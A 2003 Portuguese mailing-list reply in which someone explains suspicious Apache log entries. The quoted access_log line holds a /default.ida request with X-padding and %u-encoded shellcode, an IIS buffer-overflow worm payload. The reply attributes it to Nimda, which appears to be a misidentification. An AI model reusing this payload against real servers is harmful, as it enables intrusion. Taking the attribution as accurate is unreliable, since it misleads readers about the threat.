Mateus Reis wrote: >Venho notado logs estranhos no apache. >Abaixo segue algumas linhas pertinentes do access_log e do error_log >O vem a ser isso? E algum scaneamento ou algo do tipo? >200.171.30.44 - - [23/Mar/2003:04:25:11 -0300] "GET > /default.ida?XXXXXXXXXXXXXXX > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX >XXXXX > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX >XXXXX > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u >9090% > u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b >00%u5 31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
N�o. � algum servidor Windows infectado pelo Nimda tentando se espalhar para o
seu servidor.
--
Thiago Macieira - UFOT Registry number: 1001
[EMAIL PROTECTED]
ICQ UIN: 1967141 PGP/GPG: 0x6EF45358
Registered Linux user #65028
pgp00000.pgp
Description: signature
